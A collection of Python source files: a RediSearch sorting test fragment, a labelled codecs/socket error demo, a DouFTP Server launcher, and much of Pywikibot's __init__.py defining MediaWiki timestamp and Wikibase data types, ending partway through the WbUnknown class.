env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'ASC').equal([2, 'doc1', ['1', 'foo1'], 'doc2', ['1', 'foo2']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'DESC').equal([2, 'doc2', ['1', 'foo2'], 'doc1', ['1', 'foo1']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY').error()
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
|
codecs_socket_fail.py
|
import sys
import socketserver
class Echo(socketserver.BaseRequestHandler):
def handle(self):
# Get some bytes and echo them back to the client.
data = self.request.recv(1024)
self.request.send(data)
return
if __name__ == '__main__':
import codecs
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = socketserver.TCPServer(address, Echo)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
# Connect to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Send the data
# WRONG: Not encoded first!
text = 'français'
len_sent = s.send(text)
# Receive a response
response = s.recv(len_sent)
print(repr(response))
# Clean up
s.close()
server.socket.close()
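    # A minimal sketch (not part of the original demo) of the corrected
    # exchange, assuming UTF-8 on both ends: encode the text to bytes before
    # send() and decode the reply after recv(), instead of passing a str
    # to the socket directly.
    #
    #     outgoing = text.encode('utf-8')
    #     len_sent = s.send(outgoing)
    #     response = s.recv(len_sent).decode('utf-8')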
|
douftpserver.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""DouFTP Server"""
from multiprocessing import Process, freeze_support
from os.path import dirname
import utils.global_variable as g
from app import App
# Global variables
g.init()
g.set_item('APP_NAME', 'DouFTP Server')
g.set_item('APP_BOUNDLE_ID', 'org.douftp.server.desktop')
g.set_item('APP_DISPLAY_NAME', 'DouFTP Server 桌面端')
g.set_item('APP_VERSION', '0.0.1')
g.set_item('APP_COPYRIGHT', 'Copyright © 2018-2022 Crogram Inc.')
g.set_item('APP_PATH', dirname(__file__))  # current directory
# g.set_item('DATA_DIR', 'data')
g.set_item('APP_SITE', 'https://douftp.org?utm_source=desktop_server&version=0.0.1')
if __name__ == "__main__":
freeze_support()
Process(target=App).start()
# App()
|
__init__.py
|
# -*- coding: utf-8 -*-
"""The initialization file for the Pywikibot framework."""
#
# (C) Pywikibot team, 2008-2018
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
__version__ = __release__ = '3.1.dev0'
__url__ = 'https://www.mediawiki.org/wiki/Manual:Pywikibot'
import atexit
import datetime
from decimal import Decimal
import math
import re
import sys
import threading
import time
from warnings import warn
from pywikibot._wbtypes import WbRepresentation as _WbRepresentation
from pywikibot.bot import (
input, input_choice, input_yn, inputChoice, handle_args, showHelp, ui,
calledModuleName, Bot, CurrentPageBot, WikidataBot,
# the following are flagged as deprecated on usage
handleArgs,
)
from pywikibot.bot_choice import (
QuitKeyboardInterrupt as _QuitKeyboardInterrupt,
)
from pywikibot import config2 as config
from pywikibot.data.api import UploadWarning as _UploadWarning
from pywikibot.diff import PatchManager
from pywikibot.exceptions import (
Error, InvalidTitle, BadTitle, NoPage, NoMoveTarget, SectionError,
SiteDefinitionError, NoSuchSite, UnknownSite, UnknownFamily,
UnknownExtension,
NoUsername, UserBlocked,
PageRelatedError, UnsupportedPage, IsRedirectPage, IsNotRedirectPage,
PageSaveRelatedError, PageNotSaved, OtherPageSaveError,
LockedPage, CascadeLockedPage, LockedNoPage, NoCreateError,
EditConflict, PageDeletedConflict, PageCreatedConflict,
ServerError, FatalServerError, Server504Error,
CaptchaError, SpamfilterError, TitleblacklistError,
CircularRedirect, InterwikiRedirectPage, WikiBaseError,
CoordinateGlobeUnknownException,
DeprecatedPageNotFoundError as _DeprecatedPageNotFoundError,
_EmailUserError,
)
from pywikibot.family import Family
from pywikibot.i18n import translate
from pywikibot.logging import (
critical, debug, error, exception, log, output, stdout, warning
)
from pywikibot.site import BaseSite
import pywikibot.textlib as textlib
from pywikibot.tools import (
# __ to avoid conflict with ModuleDeprecationWrapper._deprecated
classproperty,
deprecated as __deprecated,
deprecate_arg as _deprecate_arg,
normalize_username,
MediaWikiVersion as _MediaWikiVersion,
redirect_func,
ModuleDeprecationWrapper as _ModuleDeprecationWrapper,
PY2,
UnicodeMixin,
)
from pywikibot.tools.formatter import color_format
if sys.version_info[0] > 2:
from queue import Queue
long = int
basestring = str
else:
from Queue import Queue
textlib_methods = (
'unescape', 'replaceExcept', 'removeDisabledParts', 'removeHTMLParts',
'isDisabled', 'interwikiFormat', 'interwikiSort',
'getLanguageLinks', 'replaceLanguageLinks',
'removeLanguageLinks', 'removeLanguageLinksAndSeparator',
'getCategoryLinks', 'categoryFormat', 'replaceCategoryLinks',
'removeCategoryLinks', 'removeCategoryLinksAndSeparator',
'replaceCategoryInPlace', 'compileLinkR', 'extract_templates_and_params',
'TimeStripper',
)
__all__ = (
'config', 'ui', 'Site', 'UnicodeMixin', 'translate',
'Page', 'FilePage', 'Category', 'Link', 'User',
'ItemPage', 'PropertyPage', 'Claim',
'html2unicode', 'url2unicode', 'unicode2html',
'stdout', 'output', 'warning', 'error', 'critical', 'debug',
'exception', 'input_choice', 'input', 'input_yn', 'inputChoice',
'handle_args', 'handleArgs', 'showHelp', 'ui', 'log',
'calledModuleName', 'Bot', 'CurrentPageBot', 'WikidataBot',
'Error', 'InvalidTitle', 'BadTitle', 'NoPage', 'NoMoveTarget',
'SectionError',
'SiteDefinitionError', 'NoSuchSite', 'UnknownSite', 'UnknownFamily',
'UnknownExtension',
'NoUsername', 'UserBlocked', 'UserActionRefuse',
'PageRelatedError', 'UnsupportedPage', 'IsRedirectPage',
'IsNotRedirectPage',
'PageSaveRelatedError', 'PageNotSaved', 'OtherPageSaveError',
'LockedPage', 'CascadeLockedPage', 'LockedNoPage', 'NoCreateError',
'EditConflict', 'PageDeletedConflict', 'PageCreatedConflict',
'UploadWarning',
'ServerError', 'FatalServerError', 'Server504Error',
'CaptchaError', 'SpamfilterError', 'TitleblacklistError',
'CircularRedirect', 'InterwikiRedirectPage',
'WikiBaseError', 'CoordinateGlobeUnknownException',
'QuitKeyboardInterrupt',
)
__all__ += textlib_methods
if PY2:
    # T111615: Python 2 requires __all__ to be bytes
globals()['__all__'] = tuple(bytes(item) for item in __all__)
for _name in textlib_methods:
target = getattr(textlib, _name)
wrapped_func = redirect_func(target, since='20140820')
globals()[_name] = wrapped_func
deprecated = redirect_func(__deprecated)
deprecate_arg = redirect_func(_deprecate_arg)
if sys.version_info[:2] == (2, 7) and sys.version_info[2] in (2, 3):
warn(
'Pywikibot will soon drop support for Python 2.7.2 and 2.7.3, '
'please update your Python.',
FutureWarning,
)
class Timestamp(datetime.datetime):
"""Class for handling MediaWiki timestamps.
This inherits from datetime.datetime, so it can use all of the methods
and operations of a datetime object. To ensure that the results of any
operation are also a Timestamp object, be sure to use only Timestamp
objects (and datetime.timedeltas) in any operation.
Use Timestamp.fromISOformat() and Timestamp.fromtimestampformat() to
create Timestamp objects from MediaWiki string formats.
As these constructors are typically used to create objects using data
    provided by site and page methods, some of which return a Timestamp
when previously they returned a MediaWiki string representation, these
methods also accept a Timestamp object, in which case they return a clone.
Use Site.getcurrenttime() for the current time; this is more reliable
than using Timestamp.utcnow().
"""
mediawikiTSFormat = '%Y%m%d%H%M%S'
_ISO8601Format_new = '{0:+05d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
def clone(self):
"""Clone this instance."""
return self.replace(microsecond=self.microsecond)
@classproperty
def ISO8601Format(cls):
"""ISO8601 format string class property for compatibility purpose."""
return cls._ISO8601Format()
@classmethod
def _ISO8601Format(cls, sep='T'):
"""ISO8601 format string.
@param sep: one-character separator, placed between the date and time
@type sep: str
@return: ISO8601 format string
@rtype: str
"""
        assert len(sep) == 1
return '%Y-%m-%d{0}%H:%M:%SZ'.format(sep)
@classmethod
def fromISOformat(cls, ts, sep='T'):
"""Convert an ISO 8601 timestamp to a Timestamp object.
@param ts: ISO 8601 timestamp or a Timestamp object already
        @type ts: str or Timestamp
@param sep: one-character separator, placed between the date and time
@type sep: str
@return: Timestamp object
@rtype: Timestamp
"""
        # If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
return cls.strptime(ts, cls._ISO8601Format(sep))
@classmethod
def fromtimestampformat(cls, ts):
"""Convert a MediaWiki internal timestamp to a Timestamp object."""
        # If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
if len(ts) == 8: # year, month and day are given only
ts += '000'
return cls.strptime(ts, cls.mediawikiTSFormat)
def isoformat(self, sep='T'):
"""
Convert object to an ISO 8601 timestamp accepted by MediaWiki.
datetime.datetime.isoformat does not postfix the ISO formatted date
with a 'Z' unless a timezone is included, which causes MediaWiki
~1.19 and earlier to fail.
"""
return self.strftime(self._ISO8601Format(sep))
toISOformat = redirect_func(isoformat, old_name='toISOformat',
class_name='Timestamp', since='20141219')
def totimestampformat(self):
"""Convert object to a MediaWiki internal timestamp."""
return self.strftime(self.mediawikiTSFormat)
def __str__(self):
"""Return a string format recognized by the API."""
return self.isoformat()
def __add__(self, other):
"""Perform addition, returning a Timestamp instead of datetime."""
newdt = super(Timestamp, self).__add__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
else:
return newdt
def __sub__(self, other):
"""Perform substraction, returning a Timestamp instead of datetime."""
newdt = super(Timestamp, self).__sub__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
else:
return newdt
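# A minimal usage sketch (hypothetical values) for the constructors described
# in the class docstring; both accept an existing Timestamp and return a
# clone in that case:
#
#     ts = Timestamp.fromISOformat('2018-01-01T00:00:00Z')
#     Timestamp.fromtimestampformat('20180101000000') == ts   # True
#     Timestamp.fromISOformat(ts) is ts                       # False (clone)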
class Coordinate(_WbRepresentation):
"""
Class for handling and storing Coordinates.
    For now it's just being used for DataSite, but
in the future we can use it for the GeoData extension.
"""
_items = ('lat', 'lon', 'entity')
@_deprecate_arg('entity', 'globe_item')
def __init__(self, lat, lon, alt=None, precision=None, globe=None,
typ='', name='', dim=None, site=None, globe_item=None):
"""
Represent a geo coordinate.
@param lat: Latitude
@type lat: float
@param lon: Longitude
@type lon: float
@param alt: Altitude? TODO FIXME
@param precision: precision
@type precision: float
@param globe: Which globe the point is on
@type globe: str
@param typ: The type of coordinate point
@type typ: str
@param name: The name
@type name: str
@param dim: Dimension (in meters)
@type dim: int
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@param globe_item: The Wikibase item for the globe, or the entity URI
of this Wikibase item. Takes precedence over 'globe'
if present.
@type globe_item: pywikibot.ItemPage or str
"""
self.lat = lat
self.lon = lon
self.alt = alt
self._precision = precision
self._entity = globe_item
self.type = typ
self.name = name
self._dim = dim
self.site = site or Site().data_repository()
if globe:
globe = globe.lower()
elif not globe_item:
globe = self.site.default_globe()
self.globe = globe
@property
def entity(self):
"""Return the entity uri of the globe."""
if not self._entity:
if self.globe not in self.site.globes():
raise CoordinateGlobeUnknownException(
'%s is not supported in Wikibase yet.'
% self.globe)
return self.site.globes()[self.globe]
if isinstance(self._entity, ItemPage):
return self._entity.concept_uri()
return self._entity
def toWikibase(self):
"""
Export the data to a JSON object for the Wikibase API.
FIXME: Should this be in the DataSite object?
@return: Wikibase JSON
@rtype: dict
"""
return {'latitude': self.lat,
'longitude': self.lon,
'altitude': self.alt,
'globe': self.entity,
'precision': self.precision,
}
@classmethod
def fromWikibase(cls, data, site):
"""
Constructor to create an object from Wikibase's JSON output.
@param data: Wikibase JSON
@type data: dict
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.Coordinate
"""
globe = None
if data['globe']:
globes = {}
for name, entity in site.globes().items():
globes[entity] = name
globe = globes.get(data['globe'])
return cls(data['latitude'], data['longitude'],
data['altitude'], data['precision'],
globe, site=site, globe_item=data['globe'])
@property
def precision(self):
"""
Return the precision of the geo coordinate.
The precision is calculated if the Coordinate does not have a
precision, and self._dim is set.
When no precision and no self._dim exists, None is returned.
The biggest error (in degrees) will be given by the longitudinal error;
the same error in meters becomes larger (in degrees) further up north.
We can thus ignore the latitudinal error.
The longitudinal can be derived as follows:
In small angle approximation (and thus in radians):
M{Δλ ≈ Δpos / r_φ}, where r_φ is the radius of earth at the given
latitude.
Δλ is the error in longitude.
M{r_φ = r cos φ}, where r is the radius of earth, φ the latitude
Therefore::
precision = math.degrees(
self._dim/(radius*math.cos(math.radians(self.lat))))
@rtype: float or None
"""
if self._dim is None and self._precision is None:
return None
if self._precision is None and self._dim is not None:
radius = 6378137 # TODO: Support other globes
self._precision = math.degrees(
self._dim / (radius * math.cos(math.radians(self.lat))))
return self._precision
@precision.setter
def precision(self, value):
self._precision = value
def precisionToDim(self):
"""
Convert precision from Wikibase to GeoData's dim and return the latter.
dim is calculated if the Coordinate doesn't have a dimension, and
precision is set. When neither dim nor precision are set, ValueError
is thrown.
Carrying on from the earlier derivation of precision, since
precision = math.degrees(dim/(radius*math.cos(math.radians(self.lat))))
we get:
dim = math.radians(
precision)*radius*math.cos(math.radians(self.lat))
        But this returns a float value for dim, which should be an integer,
        so we must round it off to the nearest integer.
Therefore::
dim = int(round(math.radians(
precision)*radius*math.cos(math.radians(self.lat))))
@rtype: int or None
"""
if self._dim is None and self._precision is None:
raise ValueError('No values set for dim or precision')
if self._dim is None and self._precision is not None:
radius = 6378137
self._dim = int(
round(
math.radians(self._precision) * radius * math.cos(
math.radians(self.lat))
)
)
return self._dim
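    # A worked example (hypothetical values): at the equator (lat = 0) a
    # precision of 0.0001 degrees corresponds to
    # int(round(math.radians(0.0001) * 6378137)) == 11, i.e. a dim of ~11 m.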
def get_globe_item(self, repo=None, lazy_load=False):
"""
Return the ItemPage corresponding to the globe.
Note that the globe need not be in the same data repository as the
Coordinate itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
@param repo: the Wikibase site for the globe, if different from that
provided with the Coordinate.
@type repo: pywikibot.site.DataSite
@param lazy_load: Do not raise NoPage if ItemPage does not exist.
@type lazy_load: bool
@return: pywikibot.ItemPage
"""
if isinstance(self._entity, ItemPage):
return self._entity
repo = repo or self.site
return ItemPage.from_entity_uri(repo, self.entity, lazy_load)
class WbTime(_WbRepresentation):
"""A Wikibase time representation."""
PRECISION = {'1000000000': 0,
'100000000': 1,
'10000000': 2,
'1000000': 3,
'100000': 4,
'10000': 5,
'millenia': 6,
'century': 7,
'decade': 8,
'year': 9,
'month': 10,
'day': 11,
'hour': 12,
'minute': 13,
'second': 14
}
FORMATSTR = '{0:+012d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
_items = ('year', 'month', 'day', 'hour', 'minute', 'second',
'precision', 'before', 'after', 'timezone', 'calendarmodel')
def __init__(self, year=None, month=None, day=None,
hour=None, minute=None, second=None,
precision=None, before=0, after=0,
timezone=0, calendarmodel=None, site=None):
"""
Create a new WbTime object.
The precision can be set by the Wikibase int value (0-14) or by a human
readable string, e.g., 'hour'. If no precision is given, it is set
according to the given time units.
Timezone information is given in three different ways depending on the
time:
* Times after the implementation of UTC (1972): as an offset from UTC
in minutes;
* Times before the implementation of UTC: the offset of the time zone
from universal time;
* Before the implementation of time zones: The longitude of the place
of the event, in the range −180° to 180°, multiplied by 4 to convert
to minutes.
@param year: The year as a signed integer of between 1 and 16 digits.
@type year: long
@param month: Month
@type month: int
@param day: Day
@type day: int
@param hour: Hour
@type hour: int
@param minute: Minute
@type minute: int
@param second: Second
@type second: int
@param precision: The unit of the precision of the time.
@type precision: int or str
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@type before: int
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@type after: int
@param timezone: Timezone information in minutes.
@type timezone: int
@param calendarmodel: URI identifying the calendar model
@type calendarmodel: str
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
"""
if year is None:
raise ValueError('no year given')
self.precision = self.PRECISION['second']
if second is None:
self.precision = self.PRECISION['minute']
second = 0
if minute is None:
self.precision = self.PRECISION['hour']
minute = 0
if hour is None:
self.precision = self.PRECISION['day']
hour = 0
if day is None:
self.precision = self.PRECISION['month']
day = 1
if month is None:
self.precision = self.PRECISION['year']
month = 1
self.year = long(year)
self.month = month
self.day = day
self.hour = hour
self.minute = minute
self.second = second
self.after = after
self.before = before
self.timezone = timezone
if calendarmodel is None:
if site is None:
site = Site().data_repository()
if site is None:
raise ValueError('Site %s has no data repository' % Site())
calendarmodel = site.calendarmodel()
self.calendarmodel = calendarmodel
# if precision is given it overwrites the autodetection above
if precision is not None:
if (isinstance(precision, int)
and precision in self.PRECISION.values()):
self.precision = precision
elif precision in self.PRECISION:
self.precision = self.PRECISION[precision]
else:
raise ValueError('Invalid precision: "%s"' % precision)
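    # A minimal usage sketch (hypothetical values), assuming `repo` is a
    # configured Wikibase data repository so the calendarmodel lookup
    # succeeds: with only year and month given, the precision is
    # autodetected as 'month'; an explicit precision argument would
    # override that autodetection.
    #
    #     t = WbTime(year=2010, month=5, site=repo)
    #     t.precision == WbTime.PRECISION['month']   # True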
@classmethod
def fromTimestr(cls, datetimestr, precision=14, before=0, after=0,
timezone=0, calendarmodel=None, site=None):
"""
Create a new WbTime object from a UTC date/time string.
The timestamp differs from ISO 8601 in that:
        * The year is always signed and has between 1 and 16 digits;
* The month, day and time are zero if they are unknown;
* The Z is discarded since time zone is determined from the timezone
param.
@param datetimestr: Timestamp in a format resembling ISO 8601,
e.g. +2013-01-01T00:00:00Z
@type datetimestr: str
@param precision: The unit of the precision of the time.
@type precision: int or str
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@type before: int
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@type after: int
@param timezone: Timezone information in minutes.
@type timezone: int
@param calendarmodel: URI identifying the calendar model
@type calendarmodel: str
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.WbTime
"""
match = re.match(r'([-+]?\d+)-(\d+)-(\d+)T(\d+):(\d+):(\d+)Z',
datetimestr)
if not match:
raise ValueError("Invalid format: '%s'" % datetimestr)
t = match.groups()
return cls(long(t[0]), int(t[1]), int(t[2]),
int(t[3]), int(t[4]), int(t[5]),
precision, before, after, timezone, calendarmodel, site)
@classmethod
def fromTimestamp(cls, timestamp, precision=14, before=0, after=0,
timezone=0, calendarmodel=None, site=None):
"""
Create a new WbTime object from a pywikibot.Timestamp.
@param timestamp: Timestamp
@type timestamp: pywikibot.Timestamp
@param precision: The unit of the precision of the time.
@type precision: int or str
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@type before: int
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@type after: int
@param timezone: Timezone information in minutes.
@type timezone: int
@param calendarmodel: URI identifying the calendar model
@type calendarmodel: str
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.WbTime
"""
return cls.fromTimestr(timestamp.isoformat(), precision=precision,
before=before, after=after,
timezone=timezone, calendarmodel=calendarmodel,
site=site)
def toTimestr(self, force_iso=False):
"""
Convert the data to a UTC date/time string.
See fromTimestr() for differences between output with and without
force_iso.
@param force_iso: whether the output should be forced to ISO 8601
@type force_iso: bool
@return: Timestamp in a format resembling ISO 8601
@rtype: str
"""
if force_iso:
return Timestamp._ISO8601Format_new.format(
self.year, max(1, self.month), max(1, self.day),
self.hour, self.minute, self.second)
return self.FORMATSTR.format(self.year, self.month, self.day,
self.hour, self.minute, self.second)
def toTimestamp(self):
"""
Convert the data to a pywikibot.Timestamp.
@return: Timestamp
@rtype: pywikibot.Timestamp
@raises ValueError: instance value can not be represented using
Timestamp
"""
if self.year <= 0:
raise ValueError('You cannot turn BC dates into a Timestamp')
return Timestamp.fromISOformat(
self.toTimestr(force_iso=True).lstrip('+'))
def toWikibase(self):
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
@rtype: dict
"""
json = {'time': self.toTimestr(),
'precision': self.precision,
'after': self.after,
'before': self.before,
'timezone': self.timezone,
'calendarmodel': self.calendarmodel
}
return json
@classmethod
def fromWikibase(cls, wb, site=None):
"""
Create a WbTime from the JSON data given by the Wikibase API.
@param wb: Wikibase JSON
@type wb: dict
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.WbTime
"""
return cls.fromTimestr(wb['time'], wb['precision'],
wb['before'], wb['after'],
wb['timezone'], wb['calendarmodel'], site)
class WbQuantity(_WbRepresentation):
"""A Wikibase quantity representation."""
_items = ('amount', 'upperBound', 'lowerBound', 'unit')
@staticmethod
def _require_errors(site):
"""
Check if Wikibase site is so old it requires error bounds to be given.
If no site item is supplied it raises a warning and returns True.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: bool
"""
if not site:
warning(
"WbQuantity now expects a 'site' parameter. This is needed to "
'ensure correct handling of error bounds.')
return False
return site.mw_version < '1.29.0-wmf.2'
@staticmethod
def _todecimal(value):
"""
Convert a string to a Decimal for use in WbQuantity.
None value is returned as is.
@param value: decimal number to convert
@type value: str
@rtype: Decimal
"""
if isinstance(value, Decimal):
return value
elif value is None:
return None
return Decimal(str(value))
@staticmethod
def _fromdecimal(value):
"""
Convert a Decimal to a string representation suitable for WikiBase.
None value is returned as is.
@param value: decimal number to convert
@type value: Decimal
@rtype: str
"""
if value is None:
return None
return format(value, '+g')
def __init__(self, amount, unit=None, error=None, site=None):
"""
Create a new WbQuantity object.
@param amount: number representing this quantity
@type amount: string or Decimal. Other types are accepted, and
converted via str to Decimal.
@param unit: the Wikibase item for the unit or the entity URI of this
Wikibase item.
@type unit: pywikibot.ItemPage, str or None
@param error: the uncertainty of the amount (e.g. ±1)
@type error: same as amount, or tuple of two values, where the first
value is the upper error and the second is the lower error value.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
"""
if amount is None:
raise ValueError('no amount given')
self.amount = self._todecimal(amount)
self._unit = unit
self.site = site or Site().data_repository()
# also allow entity URIs to be provided via unit parameter
if isinstance(unit, basestring) and \
unit.partition('://')[0] not in ('http', 'https'):
raise ValueError("'unit' must be an ItemPage or entity uri.")
if error is None and not self._require_errors(site):
self.upperBound = self.lowerBound = None
else:
if error is None:
upperError = lowerError = Decimal(0)
elif isinstance(error, tuple):
upperError = self._todecimal(error[0])
lowerError = self._todecimal(error[1])
else:
upperError = lowerError = self._todecimal(error)
self.upperBound = self.amount + upperError
self.lowerBound = self.amount - lowerError
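    # A minimal usage sketch (hypothetical values), assuming `repo` is a
    # configured Wikibase data repository: a scalar error is applied
    # symmetrically, while a tuple gives the upper and lower errors
    # separately.
    #
    #     q = WbQuantity(5, error=(1, 2), site=repo)
    #     (q.amount, q.upperBound, q.lowerBound)   # (Decimal(5), Decimal(6), Decimal(3))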
@property
def unit(self):
"""Return _unit's entity uri or '1' if _unit is None."""
if isinstance(self._unit, ItemPage):
return self._unit.concept_uri()
return self._unit or '1'
def get_unit_item(self, repo=None, lazy_load=False):
"""
Return the ItemPage corresponding to the unit.
Note that the unit need not be in the same data repository as the
WbQuantity itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
@param repo: the Wikibase site for the unit, if different from that
provided with the WbQuantity.
@type repo: pywikibot.site.DataSite
@param lazy_load: Do not raise NoPage if ItemPage does not exist.
@type lazy_load: bool
@return: pywikibot.ItemPage
"""
if not isinstance(self._unit, basestring):
return self._unit
repo = repo or self.site
self._unit = ItemPage.from_entity_uri(repo, self._unit, lazy_load)
return self._unit
def toWikibase(self):
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
@rtype: dict
"""
json = {'amount': self._fromdecimal(self.amount),
'upperBound': self._fromdecimal(self.upperBound),
'lowerBound': self._fromdecimal(self.lowerBound),
'unit': self.unit
}
return json
@classmethod
def fromWikibase(cls, wb, site=None):
"""
Create a WbQuantity from the JSON data given by the Wikibase API.
@param wb: Wikibase JSON
@type wb: dict
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.WbQuantity
"""
amount = cls._todecimal(wb['amount'])
upperBound = cls._todecimal(wb.get('upperBound'))
lowerBound = cls._todecimal(wb.get('lowerBound'))
bounds_provided = (upperBound is not None and lowerBound is not None)
error = None
if bounds_provided or cls._require_errors(site):
error = (upperBound - amount, amount - lowerBound)
if wb['unit'] == '1':
unit = None
else:
unit = wb['unit']
return cls(amount, unit, error, site)
class WbMonolingualText(_WbRepresentation):
"""A Wikibase monolingual text representation."""
_items = ('text', 'language')
def __init__(self, text, language):
"""
Create a new WbMonolingualText object.
@param text: text string
@type text: str
@param language: language code of the string
@type language: str
"""
if not text or not language:
raise ValueError('text and language cannot be empty')
self.text = text
self.language = language
def toWikibase(self):
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
@rtype: dict
"""
json = {'text': self.text,
'language': self.language
}
return json
@classmethod
def fromWikibase(cls, wb):
"""
Create a WbMonolingualText from the JSON data given by Wikibase API.
@param wb: Wikibase JSON
@type wb: dict
@rtype: pywikibot.WbMonolingualText
"""
return cls(wb['text'], wb['language'])
class _WbDataPage(_WbRepresentation):
"""
A Wikibase representation for data pages.
A temporary implementation until T162336 has been resolved.
    Note that this class cannot be used directly.
"""
_items = ('page', )
@classmethod
def _get_data_site(cls, repo_site):
"""
Return the site serving as a repository for a given data type.
Must be implemented in the extended class.
        @param repo_site: The Wikibase site
        @type repo_site: pywikibot.site.APISite
@rtype: pywikibot.site.APISite
"""
raise NotImplementedError
@classmethod
def _get_type_specifics(cls, site):
"""
Return the specifics for a given data type.
Must be implemented in the extended class.
The dict should have three keys:
* ending: str, required filetype-like ending in page titles.
* label: str, describing the data type for use in error messages.
* data_site: pywikibot.site.APISite, site serving as a repository for
the given data type.
@param site: The Wikibase site
@type site: pywikibot.site.APISite
@rtype: dict
"""
raise NotImplementedError
@staticmethod
def _validate(page, data_site, ending, label):
"""
Validate the provided page against general and type specific rules.
@param page: Page containing the data.
        @type page: pywikibot.Page
@param data_site: The site serving as a repository for the given
data type.
@type data_site: pywikibot.site.APISite
@param ending: Required filetype-like ending in page titles.
E.g. '.map'
@type ending: str
@param label: Label describing the data type in error messages.
        @type label: str
"""
if not isinstance(page, Page):
raise ValueError('Page must be a pywikibot.Page object.')
# validate page exists
if not page.exists():
raise ValueError('Page must exist.')
# validate page is on the right site, and that site supports the type
if not data_site:
raise ValueError(
'The provided site does not support {0}.'.format(label))
if page.site != data_site:
raise ValueError(
'Page must be on the {0} repository site.'.format(label))
# validate page title fulfills hard-coded Wikibase requirement
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.map$/u' for geo-shape
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.tab$/u' for tabular-data
# As we have already checked for existence the following simplified
# check should be enough.
if not page.title().startswith('Data:') or \
not page.title().endswith(ending):
raise ValueError(
"Page must be in 'Data:' namespace and end in '{0}' "
'for {1}.'.format(ending, label))
def __init__(self, page, site=None):
"""
Create a new _WbDataPage object.
@param page: page containing the data
        @type page: pywikibot.Page
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
"""
site = site or Site().data_repository()
specifics = type(self)._get_type_specifics(site)
_WbDataPage._validate(page, specifics['data_site'],
specifics['ending'], specifics['label'])
self.page = page
def __hash__(self):
"""Override super.hash() as toWikibase is a string for _WbDataPage."""
return hash(self.toWikibase())
def toWikibase(self):
"""
Convert the data to the value required by the Wikibase API.
@return: title of the data page incl. namespace
@rtype: str
"""
return self.page.title()
@classmethod
def fromWikibase(cls, page_name, site):
"""
Create a _WbDataPage from the JSON data given by the Wikibase API.
@param page_name: page name from Wikibase value
@type page_name: str
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot._WbDataPage
"""
data_site = cls._get_data_site(site)
page = Page(data_site, page_name)
return cls(page, site)
class WbGeoShape(_WbDataPage):
"""A Wikibase geo-shape representation."""
@classmethod
def _get_data_site(cls, site):
"""
Return the site serving as a geo-shape repository.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.site.APISite
"""
return site.geo_shape_repository()
@classmethod
def _get_type_specifics(cls, site):
"""
Return the specifics for WbGeoShape.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: dict
"""
specifics = {
'ending': '.map',
'label': 'geo-shape',
'data_site': cls._get_data_site(site)
}
return specifics
class WbTabularData(_WbDataPage):
"""A Wikibase tabular-data representation."""
@classmethod
def _get_data_site(cls, site):
"""
Return the site serving as a tabular-data repository.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.site.APISite
"""
return site.tabular_data_repository()
@classmethod
def _get_type_specifics(cls, site):
"""
Return the specifics for WbTabularData.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: dict
"""
specifics = {
'ending': '.tab',
'label': 'tabular-data',
'data_site': cls._get_data_site(site)
}
return specifics
class WbUnknown(_WbRepresentation):
"""
A Wikibase representation for unknown data type.
